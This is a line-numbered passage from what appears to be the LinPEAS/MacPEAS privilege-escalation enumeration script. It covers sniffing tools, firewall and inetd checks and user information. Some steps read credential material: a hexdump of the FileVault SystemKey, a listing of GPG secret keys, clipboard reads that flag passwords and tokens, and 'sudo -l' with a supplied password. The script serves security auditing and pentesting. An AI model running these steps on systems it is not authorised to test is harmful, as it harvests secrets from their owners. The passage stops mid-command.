tools_found=1 8703 # Check tcpdump version and capabilities 8704 warn_exec tcpdump --version 2>/dev/null | head -n 1 8705 getcap "$(command -v tcpdump)" 2>/dev/null 8706 fi 8707 if check_command dumpcap; then 8708 echo "dumpcap is available" | sed -${E} "s,.*,${SED_GREEN},g" 8709 tools_found=1 8710 warn_exec dumpcap --version 2>/dev/null | head -n 1 8711 getcap "$(command -v dumpcap)" 2>/dev/null 8712 if id -nG 2>/dev/null | grep -qw wireshark; then 8713 echo "Current user is in wireshark group" | sed -${E} "s,.*,${SED_GREEN},g" 8714 elif getent group wireshark >/dev/null 2>&1; then 8715 echo "wireshark group exists but current user is not in it" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 8716 fi 8717 fi 8718 if check_command tshark; then 8719 echo "tshark is available" | sed -${E} "s,.*,${SED_GREEN},g" 8720 tools_found=1 8721 # Check tshark version 8722 warn_exec tshark --version 2>/dev/null | head -n 1 8723 fi 8724 if check_command wireshark; then 8725 echo "wireshark is available" | sed -${E} "s,.*,${SED_GREEN},g" 8726 tools_found=1 8727 fi 8728 if check_command ngrep; then 8729 echo "ngrep is available" | sed -${E} "s,.*,${SED_GREEN},g" 8730 tools_found=1 8731 fi 8732 if check_command tcpflow; then 8733 echo "tcpflow is available" | sed -${E} "s,.*,${SED_GREEN},g" 8734 tools_found=1 8735 fi 8736 if [ $tools_found -eq 0 ]; then 8737 echo "No sniffing tools found" | sed -${E} "s,.*,${SED_RED},g" 8738 fi 8739 if check_command tcpdump; then 8740 echo "Sniffable interfaces according to tcpdump -D:" 8741 timeout 2 tcpdump -D 2>/dev/null 8742 elif check_command dumpcap; then 8743 echo "Sniffable interfaces according to dumpcap -D:" 8744 timeout 2 dumpcap -D 2>/dev/null 8745 fi 8746 # Check network interfaces 8747 echo "" 8748 print_3title "Network Interfaces Sniffing Capabilities" "T1040" 8749 interfaces_found=0 8750 # Get list of network interfaces 8751 if command -v ip >/dev/null 2>&1; then 8752 interfaces=$(ip -o link show | awk -F': ' '{print $2}') 8753 elif command -v ifconfig >/dev/null 2>&1; then 8754 interfaces=$(ifconfig -a | grep -o '^[^ ]*:' | tr -d ':') 8755 else 8756 interfaces=$(ls /sys/class/net/ 2>/dev/null) 8757 fi 8758 for iface in $interfaces; do 8759 if [ "$iface" = "lo" ]; then 8760 echo -n "Interface $iface (loopback): " 8761 else 8762 echo -n "Interface $iface: " 8763 fi 8764 if check_interface_sniffable "$iface"; then 8765 echo "Sniffable" | sed -${E} "s,.*,${SED_GREEN},g" 8766 interfaces_found=1 8767 # Check promiscuous mode 8768 if [ "$iface" != "lo" ] && check_promiscuous_mode "$iface"; then 8769 echo " - Promiscuous mode enabled" | sed -${E} "s,.*,${SED_RED},g" 8770 fi 8771 # Get interface details 8772 if [ "$EXTRA_CHECKS" ]; then 8773 echo " - Interface details:" 8774 warn_exec ip addr show "$iface" 2>/dev/null || ifconfig "$iface" 2>/dev/null 8775 fi 8776 else 8777 echo "Not sniffable" | sed -${E} "s,.*,${SED_RED},g" 8778 fi 8779 done 8780 if [ $interfaces_found -eq 0 ]; then 8781 echo "No sniffable interfaces found" | sed -${E} "s,.*,${SED_RED},g" 8782 fi 8783 # Check for sensitive traffic patterns if we have sniffing capabilities 8784 if [ $tools_found -eq 1 ] && [ $interfaces_found -eq 1 ]; then 8785 echo "" 8786 print_3title "Sensitive Traffic Detection" "T1040" 8787 print_info "Checking for common sensitive traffic patterns..." 8788 # List of sensitive traffic patterns to check 8789 patterns=" 8790 - HTTP Basic Auth 8791 - FTP credentials 8792 - SMTP credentials 8793 - MySQL/MariaDB traffic 8794 - PostgreSQL traffic 8795 - Redis traffic 8796 - MongoDB traffic 8797 - LDAP traffic 8798 - SMB traffic 8799 - DNS queries 8800 - SNMP traffic 8801 - Many more... 8802 " 8803 echo "$patterns" | while read -r pattern; do 8804 if [ -n "$pattern" ]; then 8805 echo "$pattern" 8806 fi 8807 done 8808 print_info "To capture sensitive traffic, you can use:" 8809 echo "tcpdump -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g" 8810 echo "tshark -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g" 8811 echo "dumpcap -i <interface> -w capture.pcap" | sed -${E} "s,.*,${SED_GREEN},g" 8812 fi 8813 echo "" 8814 print_3title "Running sniffing/traffic reconstruction processes" "T1040" 8815 ps aux 2>/dev/null | grep -E "[t]cpdump|[d]umpcap|[t]shark|[w]ireshark|[n]grep|[t]cpflow" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 8816 # Additional information 8817 if [ "$EXTRA_CHECKS" ]; then 8818 echo "" 8819 print_3title "Additional Network Analysis Information" "T1040" 8820 # Check for network monitoring tools 8821 echo "Checking for network monitoring tools..." 8822 for tool in nethogs iftop iotop nload bmon; do 8823 if check_command "$tool"; then 8824 echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g" 8825 fi 8826 done 8827 fi 8828 echo "" 8829 } 8830 # Run the main function 8831 check_network_traffic_analysis 8832 8833 fi 8834 8835 if check_mitre_filter "T1016"; then 8836 # Function to check if a command exists and is executable 8837 check_command() { 8838 local cmd=$1 8839 if command -v "$cmd" >/dev/null 2>&1; then 8840 if [ -x "$(command -v "$cmd")" ]; then 8841 return 0 8842 fi 8843 fi 8844 return 1 8845 } 8846 # Function to analyze iptables rules 8847 analyze_iptables() { 8848 echo "" 8849 print_3title "Iptables Rules" "T1016" 8850 # Check if iptables is available 8851 if ! check_command iptables; then 8852 echo_not_found "iptables" 8853 return 8854 fi 8855 # Check if we have permission to list rules 8856 if ! timeout 1 iptables -L >/dev/null 2>&1; then 8857 echo "No permission to list iptables rules" | sed -${E} "s,.*,${SED_RED},g" 8858 return 8859 fi 8860 # Get iptables version 8861 warn_exec iptables --version 2>/dev/null 8862 # List all chains and rules 8863 echo -e "\nFilter Table Rules:" 8864 warn_exec iptables -L -v -n 2>/dev/null 8865 echo -e "\nNAT Table Rules:" 8866 warn_exec iptables -t nat -L -v -n 2>/dev/null 8867 echo -e "\nMangle Table Rules:" 8868 warn_exec iptables -t mangle -L -v -n 2>/dev/null 8869 # Check for custom chains 8870 echo -e "\nCustom Chains:" 8871 warn_exec iptables -L -v -n | grep -E "^Chain [A-Za-z]" | grep -v "INPUT\|OUTPUT\|FORWARD\|PREROUTING\|POSTROUTING" 2>/dev/null 8872 # Check for saved rules 8873 echo -e "\nSaved Rules:" 8874 for rules_file in /etc/iptables/* /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/iptables-save /etc/iptables.save; do 8875 if [ -f "$rules_file" ]; then 8876 echo "Found rules in $rules_file:" 8877 warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null 8878 fi 8879 done 8880 } 8881 # Function to analyze nftables rules 8882 analyze_nftables() { 8883 echo "" 8884 print_3title "Nftables Rules" "T1016" 8885 # Check if nft is available 8886 if ! check_command nft; then 8887 echo_not_found "nftables" 8888 return 8889 fi 8890 # Check if we have permission to list rules 8891 if ! timeout 1 nft list ruleset >/dev/null 2>&1; then 8892 echo "No permission to list nftables rules" | sed -${E} "s,.*,${SED_RED},g" 8893 return 8894 fi 8895 # Get nftables version 8896 warn_exec nft --version 2>/dev/null 8897 # List all rules 8898 echo -e "\nNftables Ruleset:" 8899 warn_exec nft list ruleset 2>/dev/null 8900 echo -e "\nNftables Ruleset with handles (-a):" 8901 warn_exec nft -a list ruleset 2>/dev/null | sed -${E} "s,\\bdrop\\b|\\breject\\b|handle [0-9]+,${SED_RED_YELLOW},g" 8902 # Check for saved rules 8903 echo -e "\nSaved Rules:" 8904 for rules_file in /etc/nftables.conf /etc/sysconfig/nftables.conf; do 8905 if [ -f "$rules_file" ]; then 8906 echo "Found rules in $rules_file:" 8907 warn_exec cat "$rules_file" | grep -v "^#" | grep -Ev "\W+\#|^#" 2>/dev/null 8908 fi 8909 done 8910 } 8911 # Function to analyze firewalld rules 8912 analyze_firewalld() { 8913 echo "" 8914 print_3title "Firewalld Rules" "T1016" 8915 # Check if firewall-cmd is available 8916 if ! check_command firewall-cmd; then 8917 echo_not_found "firewalld" 8918 return 8919 fi 8920 # Check if firewalld is running 8921 if ! systemctl is-active firewalld >/dev/null 2>&1; then 8922 echo "Firewalld is not running" | sed -${E} "s,.*,${SED_YELLOW},g" 8923 return 8924 fi 8925 # Get firewalld version 8926 warn_exec firewall-cmd --version 2>/dev/null 8927 # List all zones 8928 echo -e "\nFirewalld Zones:" 8929 warn_exec firewall-cmd --list-all-zones 2>/dev/null 8930 # List active zones 8931 echo -e "\nActive Zones:" 8932 warn_exec firewall-cmd --get-active-zones 2>/dev/null 8933 # List services 8934 echo -e "\nAvailable Services:" 8935 warn_exec firewall-cmd --list-services 2>/dev/null 8936 # List ports 8937 echo -e "\nOpen Ports:" 8938 warn_exec firewall-cmd --list-ports 2>/dev/null 8939 # List rich rules 8940 echo -e "\nRich Rules:" 8941 warn_exec firewall-cmd --list-rich-rules 2>/dev/null 8942 } 8943 # Function to analyze UFW rules 8944 analyze_ufw() { 8945 echo "" 8946 print_3title "UFW Rules" "T1016" 8947 # Check if ufw is available 8948 if ! check_command ufw; then 8949 echo_not_found "ufw" 8950 return 8951 fi 8952 # Check if UFW is running 8953 if ! ufw status >/dev/null 2>&1; then 8954 echo "UFW is not running" | sed -${E} "s,.*,${SED_YELLOW},g" 8955 return 8956 fi 8957 # Get UFW version 8958 warn_exec ufw version 2>/dev/null 8959 # List rules 8960 echo -e "\nUFW Rules:" 8961 warn_exec ufw status verbose 2>/dev/null 8962 # List numbered rules 8963 echo -e "\nNumbered Rules:" 8964 warn_exec ufw status numbered 2>/dev/null 8965 } 8966 # Main function to analyze firewall rules 8967 analyze_firewall_rules() { 8968 print_2title "Firewall Rules Analysis" "T1016" 8969 # Analyze different firewall systems 8970 analyze_iptables 8971 analyze_nftables 8972 analyze_firewalld 8973 analyze_ufw 8974 echo "" 8975 print_3title "Forwarding and rp_filter" "T1016" 8976 for sysctl_var in net.ipv4.ip_forward net.ipv6.conf.all.forwarding net.ipv4.conf.all.rp_filter; do 8977 sysctl "$sysctl_var" 2>/dev/null | sed -${E} "s,=[[:space:]]*1,${SED_RED_YELLOW},g" 8978 done 8979 if check_command conntrack; then 8980 echo -e "\nConntrack state (first 20):" 8981 warn_exec conntrack -L 2>/dev/null | head -n 20 8982 fi 8983 # Additional checks if EXTRA_CHECKS is enabled 8984 if [ "$EXTRA_CHECKS" ]; then 8985 echo "" 8986 print_3title "Additional Firewall Information" "T1016" 8987 # Check for common firewall configuration files 8988 echo "Checking for firewall configuration files..." 8989 for config_file in /etc/sysconfig/iptables /etc/sysconfig/ip6tables /etc/iptables/rules.v4 /etc/iptables/rules.v6 /etc/nftables.conf /etc/ufw/user.rules /etc/ufw/user6.rules; do 8990 if [ -f "$config_file" ]; then 8991 echo "Found configuration file: $config_file" | sed -${E} "s,.*,${SED_GREEN},g" 8992 fi 8993 done 8994 # Check for firewall management tools 8995 echo -e "\nChecking for firewall management tools..." 8996 for tool in shorewall shorewall6 ferm; do 8997 if check_command "$tool"; then 8998 echo "$tool is available" | sed -${E} "s,.*,${SED_GREEN},g" 8999 fi 9000 done 9001 fi 9002 echo "" 9003 } 9004 # Run the main function 9005 analyze_firewall_rules 9006 9007 fi 9008 9009 if check_mitre_filter "T1049"; then 9010 # Function to check if a command exists and is executable 9011 check_command() { 9012 local cmd=$1 9013 if command -v "$cmd" >/dev/null 2>&1; then 9014 if [ -x "$(command -v "$cmd")" ]; then 9015 return 0 9016 fi 9017 fi 9018 return 1 9019 } 9020 # Function to analyze inetd services 9021 analyze_inetd() { 9022 echo "" 9023 print_3title "Inetd Services" "T1049" 9024 # Check if inetd is installed 9025 if ! check_command inetd; then 9026 echo_not_found "inetd" 9027 return 9028 fi 9029 # Check if inetd is running 9030 if ! pgrep -x inetd >/dev/null 2>&1; then 9031 echo "inetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g" 9032 fi 9033 # Get inetd version 9034 warn_exec inetd -v 2>/dev/null 9035 # Check main configuration file 9036 if [ -f "/etc/inetd.conf" ]; then 9037 echo -e "\nInetd Configuration (/etc/inetd.conf):" 9038 warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null 9039 # Check for potentially dangerous services 9040 echo -e "\nPotentially Dangerous Services:" 9041 warn_exec cat /etc/inetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" | grep -iE "shell|login|exec|rsh|rlogin|rexec|finger|telnet|ftp|tftp" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 9042 else 9043 echo_not_found "/etc/inetd.conf" 9044 fi 9045 # Check for additional configuration files 9046 echo -e "\nAdditional Inetd Configuration Files:" 9047 for conf_file in /etc/inetd.d/* /etc/inet/*.conf; do 9048 if [ -f "$conf_file" ]; then 9049 echo "Found configuration in $conf_file:" 9050 warn_exec cat "$conf_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null 9051 fi 9052 done 9053 } 9054 # Function to analyze xinetd services 9055 analyze_xinetd() { 9056 echo "" 9057 print_3title "Xinetd Services" "T1049" 9058 # Check if xinetd is installed 9059 if ! check_command xinetd; then 9060 echo_not_found "xinetd" 9061 return 9062 fi 9063 # Check if xinetd is running 9064 if ! pgrep -x xinetd >/dev/null 2>&1; then 9065 echo "xinetd is not running" | sed -${E} "s,.*,${SED_YELLOW},g" 9066 fi 9067 # Get xinetd version 9068 warn_exec xinetd -version 2>/dev/null 9069 # Check main configuration file 9070 if [ -f "/etc/xinetd.conf" ]; then 9071 echo -e "\nXinetd Configuration (/etc/xinetd.conf):" 9072 warn_exec cat /etc/xinetd.conf | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null 9073 # Check for included configurations 9074 echo -e "\nIncluded Configurations:" 9075 warn_exec grep -r "includedir" /etc/xinetd.conf 2>/dev/null 9076 else 9077 echo_not_found "/etc/xinetd.conf" 9078 fi 9079 # Check for service-specific configurations 9080 echo -e "\nService Configurations:" 9081 for service_dir in /etc/xinetd.d/ /etc/xinetd/; do 9082 if [ -d "$service_dir" ]; then 9083 echo "Services in $service_dir:" 9084 for service_file in "$service_dir"/*; do 9085 if [ -f "$service_file" ]; then 9086 service_name=$(basename "$service_file") 9087 echo -e "\nService: $service_name" 9088 # Check if service is enabled 9089 if grep -q "disable.*=.*no" "$service_file" 2>/dev/null; then 9090 echo "Status: Enabled" | sed -${E} "s,.*,${SED_RED},g" 9091 else 9092 echo "Status: Disabled" 9093 fi 9094 # Show service configuration 9095 warn_exec cat "$service_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null 9096 # Check for potentially dangerous configurations 9097 if grep -qiE "server.*=.*/bin/|server.*=.*/sbin/|server.*=.*/usr/bin/|server.*=.*/usr/sbin/" "$service_file" 2>/dev/null; then 9098 echo "Warning: Service uses system binaries" | sed -${E} "s,.*,${SED_RED},g" 9099 fi 9100 if grep -qiE "user.*=.*root|user.*=.*0" "$service_file" 2>/dev/null; then 9101 echo "Warning: Service runs as root" | sed -${E} "s,.*,${SED_RED},g" 9102 fi 9103 fi 9104 done 9105 fi 9106 done 9107 } 9108 # Function to check for running inetd/xinetd services 9109 check_running_services() { 9110 echo "" 9111 print_3title "Running Inetd/Xinetd Services" "T1049" 9112 # Check netstat for services 9113 if check_command netstat; then 9114 echo "Active Services (from netstat):" 9115 warn_exec netstat -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g" 9116 fi 9117 # Check ss for services 9118 if check_command ss; then 9119 echo -e "\nActive Services (from ss):" 9120 warn_exec ss -tulpn 2>/dev/null | grep -E "inetd|xinetd" | sed -${E} "s,.*,${SED_RED},g" 9121 fi 9122 # Check for service processes 9123 echo -e "\nRunning Service Processes:" 9124 for inetd_service in $(pgrep -l inetd 2>/dev/null; pgrep -l xinetd 2>/dev/null); do 9125 echo "$inetd_service" | sed -${E} "s,.*,${SED_RED},g" 9126 done 9127 } 9128 # Main function to analyze inetd/xinetd services 9129 analyze_inetd_services() { 9130 print_2title "Inetd/Xinetd Services Analysis" "T1049" 9131 # Analyze inetd and xinetd services 9132 analyze_inetd 9133 analyze_xinetd 9134 # Check for running services 9135 check_running_services 9136 # Additional checks if EXTRA_CHECKS is enabled 9137 if [ "$EXTRA_CHECKS" ]; then 9138 echo "" 9139 print_3title "Additional Inetd/Xinetd Information" "T1049" 9140 # Check for inetd/xinetd logs 9141 echo "Checking for service logs..." 9142 for log_file in /var/log/inetd.log /var/log/xinetd.log /var/log/messages /var/log/syslog; do 9143 if [ -f "$log_file" ]; then 9144 echo "Found log file: $log_file" | sed -${E} "s,.*,${SED_GREEN},g" 9145 warn_exec tail -n 20 "$log_file" | grep -iE "inetd|xinetd" 2>/dev/null 9146 fi 9147 done 9148 # Check for inetd/xinetd related files 9149 echo -e "\nChecking for related files..." 9150 for file in /etc/init.d/inetd /etc/init.d/xinetd /etc/default/inetd /etc/default/xinetd; do 9151 if [ -f "$inetd_file" ]; then 9152 echo "Found file: $inetd_file" | sed -${E} "s,.*,${SED_GREEN},g" 9153 warn_exec cat "$inetd_file" | grep -v "^$" | grep -Ev "\W+\#|^#" 2>/dev/null 9154 fi 9155 done 9156 fi 9157 echo "" 9158 } 9159 # Run the main function 9160 analyze_inetd_services 9161 9162 fi 9163 9164 if check_mitre_filter "T1016"; then 9165 if [ "$MACPEAS" ] && [ "$EXTRA_CHECKS" ]; then 9166 print_2title "Hardware Ports" "T1016" 9167 networksetup -listallhardwareports 9168 echo "" 9169 print_2title "VLANs" "T1016" 9170 networksetup -listVLANs 9171 echo "" 9172 print_2title "Wifi Info" "T1016" 9173 networksetup -getinfo Wi-Fi 9174 echo "" 9175 print_2title "Check Enabled Proxies" "T1016" 9176 scutil --proxy 9177 echo "" 9178 print_2title "Wifi Proxy URL" "T1016" 9179 networksetup -getautoproxyurl Wi-Fi 9180 echo "" 9181 print_2title "Wifi Web Proxy" "T1016" 9182 networksetup -getwebproxy Wi-Fi 9183 echo "" 9184 fi 9185 9186 fi 9187 9188 if check_mitre_filter "T1016,T1590"; then 9189 print_2title "Internet Access?" "T1016,T1590" 9190 TIMEOUT_INTERNET_SECONDS=5 9191 if [ "$SUPERFAST" ]; then 9192 TIMEOUT_INTERNET_SECONDS=2.5 9193 fi 9194 # Run all checks in background 9195 check_tcp_80 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid1=$! 9196 check_tcp_443 "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid2=$! 9197 check_icmp "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid3=$! 9198 check_dns "$TIMEOUT_INTERNET_SECONDS" 2>/dev/null & pid4=$! 9199 # Kill all check workers after timeout + 1s without relying on integer arithmetic 9200 (sleep "$TIMEOUT_INTERNET_SECONDS"; sleep 1; kill -9 $pid1 $pid2 $pid3 $pid4 2>/dev/null) & 9201 check_tcp_443_bin $TIMEOUT_INTERNET_SECONDS 2>/dev/null 9202 tcp443_bin_status=$? 9203 wait $pid1 $pid2 $pid3 $pid4 2>/dev/null 9204 # Wait for all to finish 9205 wait 2>/dev/null 9206 if [ "$tcp443_bin_status" -eq 0 ] && \ 9207 [ -z "$SUPERFAST" ] && [ -z "$NOT_CHECK_EXTERNAL_HOSTNAME" ]; then 9208 echo "" 9209 print_2title "Is hostname malicious or leaked?" "T1016,T1590" 9210 print_info "This will check the public IP and hostname in known malicious lists and leaks to find any relevant information about the host." 9211 check_external_hostname 2>/dev/null 9212 fi 9213 echo "" 9214 print_3title "Proxy discovery" "T1016,T1590" 9215 print_info "Checking common proxy env vars and apt proxy config" 9216 (env | grep -iE '^(http|https|ftp|all)_proxy=|^no_proxy=') 2>/dev/null | sed -${E} "s,_proxy|no_proxy,${SED_RED_YELLOW},g" 9217 grep -RinE 'Acquire::(http|https)::Proxy|proxy' /etc/apt/apt.conf /etc/apt/apt.conf.d 2>/dev/null | sed -${E} "s,proxy|Acquire::http::Proxy|Acquire::https::Proxy,${SED_RED_YELLOW},g" 9218 echo "" 9219 9220 fi 9221 9222 fi 9223 9224 fi 9225 echo '' 9226 echo '' 9227 if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi 9228 9229 if echo $CHECKS | grep -q users_information; then 9230 if check_mitre_filter "T1548.003,T1548.004,T1068,T1087.001,T1069.001,T1033,T1201,T1110.001,T1543.001,T1555.001,T1552.004,T1115"; then 9231 print_title "Users Information" 9232 if check_mitre_filter "T1033,T1543.001"; then 9233 if [ "$MACPEAS" ];then 9234 print_2title "Current user Login and Logout hooks" "T1033,T1543.001" 9235 defaults read $HOME/Library/Preferences/com.apple.loginwindow.plist 2>/dev/null | grep -e "Hook" 9236 echo "" 9237 fi 9238 9239 fi 9240 9241 if check_mitre_filter "T1033"; then 9242 print_2title "My user" "T1033" 9243 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#users" 9244 (id || (whoami && groups)) 2>/dev/null | sed -${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed -${E} "s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed "s,root,${SED_RED}," | sed -${E} "s,$knw_grps,${SED_GREEN},g" | sed -${E} "s,$idB,${SED_RED},g" 9245 echo "" 9246 9247 fi 9248 9249 if check_mitre_filter "T1543.001"; then 9250 if [ "$MACPEAS" ];then 9251 print_2title "All Login and Logout hooks" "T1543.001" 9252 for user_home in /Users/*/ /private/var/root/; do 9253 if [ -f "${user_home}Library/Preferences/com.apple.loginwindow.plist" ]; then 9254 echo "User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9255 defaults read "${user_home}Library/Preferences/com.apple.loginwindow.plist" 2>/dev/null | grep -e "Hook" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9256 fi 9257 done 9258 echo "" 9259 fi 9260 9261 fi 9262 9263 if check_mitre_filter "T1555.001"; then 9264 if [ "$MACPEAS" ];then 9265 print_2title "Keychains" "T1555.001" 9266 print_info "https://book.hacktricks.wiki/en/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-sensitive-locations.html#chainbreaker" 9267 echo "System Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9268 security list-keychains 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 9269 echo -e "\nUser Keychains:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9270 for user_home in /Users/*/; do 9271 if [ -d "${user_home}Library/Keychains" ]; then 9272 echo "- User: $(basename "$user_home")" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9273 ls -la "${user_home}Library/Keychains/" 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 9274 fi 9275 done 9276 echo "" 9277 fi 9278 9279 fi 9280 9281 if check_mitre_filter "T1555.001"; then 9282 if [ "$MACPEAS" ];then 9283 print_2title "SystemKey" "T1555.001" 9284 echo "The SystemKey is used by FileVault to encrypt/decrypt the volume. If you can read it, you might be able to decrypt the disk." 9285 echo -e "\nSystemKey file permissions:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9286 ls -l /var/db/SystemKey 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9287 if [ -r "/var/db/SystemKey" ]; then 9288 echo -e "\nWARNING: You can read /var/db/SystemKey!" | sed -${E} "s,.*,${SED_RED},g" 9289 echo "SystemKey content (first 24 bytes after header):" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9290 hexdump -s 8 -n 24 -e '1/1 "%.2x"' /var/db/SystemKey | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9291 fi 9292 echo "" 9293 fi 9294 9295 fi 9296 9297 if check_mitre_filter "T1552.004"; then 9298 print_2title "PGP Keys and Related Files" "T1552.004" 9299 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#pgp-keys" 9300 # Check for GPG 9301 echo "GPG:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9302 if command -v gpg >/dev/null 2>&1; then 9303 echo "GPG is installed, listing keys:" 9304 gpg --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 9305 # Check for private keys 9306 gpg --list-secret-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9307 else 9308 echo_not_found "gpg" 9309 fi 9310 # Check for NetPGP 9311 echo -e "\nNetPGP:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9312 if command -v netpgpkeys >/dev/null 2>&1; then 9313 echo "NetPGP is installed" | sed -${E} "s,.*,${SED_RED_YELLOW},g" 9314 netpgpkeys --list-keys 2>/dev/null | sed -${E} "s,.*,${SED_RED},g" 9315 else 9316 echo_not_found "netpgpkeys" 9317 fi 9318 # Check for common PGP files 9319 echo -e "\nPGP Related Files:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9320 for pgp_file in "$HOME/.gnupg" "$HOME/.pgp" "$HOME/.openpgp" "$HOME/.ssh/gpg-agent.conf" "$HOME/.config/gpg"; do 9321 if [ -e "$pgp_file" ]; then 9322 echo "Found: $pgp_file" 9323 if [ -d "$pgp_file" ]; then 9324 ls -la "$pgp_file" 2>/dev/null 9325 fi 9326 fi 9327 done 9328 echo "" 9329 9330 fi 9331 9332 if check_mitre_filter "T1115"; then 9333 if [ "$(command -v xclip 2>/dev/null || echo -n '')" ] || [ "$(command -v xsel 2>/dev/null || echo -n '')" ] || [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ] || [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then 9334 print_2title "Clipboard and Highlighted Text" "T1115" 9335 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#clipboard" 9336 # Function to check clipboard content 9337 check_clipboard() { 9338 local content="$1" 9339 if [ -n "$content" ]; then 9340 echo "$content" | sed -${E} "s,$pwd_inside_history,${SED_RED},g" | sed -${E} "s,(password|passwd|pwd).*=.*,${SED_RED},g" | sed -${E} "s,(token|key|secret).*=.*,${SED_RED},g" 9341 fi 9342 } 9343 # Check different clipboard tools 9344 if [ "$(command -v xclip 2>/dev/null || echo -n '')" ]; then 9345 echo "Using xclip:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9346 echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9347 check_clipboard "$(xclip -o -selection clipboard 2>/dev/null)" 9348 echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9349 check_clipboard "$(xclip -o 2>/dev/null)" 9350 elif [ "$(command -v xsel 2>/dev/null || echo -n '')" ]; then 9351 echo "Using xsel:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9352 echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9353 check_clipboard "$(xsel -ob 2>/dev/null)" 9354 echo "Highlighted text:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9355 check_clipboard "$(xsel -o 2>/dev/null)" 9356 elif [ "$(command -v pbpaste 2>/dev/null || echo -n '')" ]; then 9357 echo "Using pbpaste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9358 echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9359 check_clipboard "$(pbpaste 2>/dev/null)" 9360 elif [ "$(command -v wl-paste 2>/dev/null || echo -n '')" ]; then 9361 echo "Using wl-paste:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9362 echo "Clipboard:" | sed -${E} "s,.*,${SED_LIGHT_CYAN},g" 9363 check_clipboard "$(wl-paste 2>/dev/null)" 9364 else 9365 echo_not_found "clipboard tools (xclip, xsel, pbpaste, wl-paste)" 9366 fi 9367 echo "" 9368 fi 9369 9370 fi 9371 9372 if check_mitre_filter "T1548.003"; then 9373 print_2title "Checking 'sudo -l', /etc/sudoers, and /etc/sudoers.d" "T1548.003" 9374 print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid" 9375 sudo_l_colorize() { 9376 sed "s,_proxy,${SED_RED},g" | sed "s,$sudoG,${SED_GREEN},g" | sed -${E} "s,$sudoVB1,${SED_RED_YELLOW}," | sed -${E} "s,$sudoVB2,${SED_RED_YELLOW}," | sed -${E} "s,$sudoB,${SED_RED},g" 9377 } 9378 sudo_l_colorize_output() { 9379 printf "%s\n" "$1" | sudo_l_colorize | sed "s,\!root,${SED_RED}," 9380 } 9381 sudo_l_colorize_file() { 9382 grep -Iv "^$" "$1" | grep -v "#" | sudo_l_colorize | sed "s,pwfeedback,${SED_RED},g" 9383 } 9384 if [ "$(command -v sudo 2>/dev/null || echo -n '')" ]; then 9385 if [ "$TIMEOUT" ]; then 9386 sudo_l_output=$(printf '\n' | "$TIMEOUT" 15 sudo -S -l 2>/dev/null) 9387 else 9388 sudo_l_output=$(sudo -n -l 2>/dev/null) 9389 fi 9390 sudo_l_colorize_output "$sudo_l_output" 9391 if [ "$PASSWORD" ]; then 9392 if [ "$TIMEOUT" ]; then 9393 sudo_l_password_output=$(printf "%s\n" "$PASSWORD" | "$TIMEOUT" 15 sudo -S -l 2>/dev/null) 9394 else 9395 sudo_l_password_output=$(printf "%s\n" "$PASSWORD" | sudo -S -l 2>/dev/null) 9396 fi 9397 printf "%s\n" "$sudo_l_password_output" | sudo_l_colorize 9398 fi 9399 sudo_l_cached_output=$(sudo -n 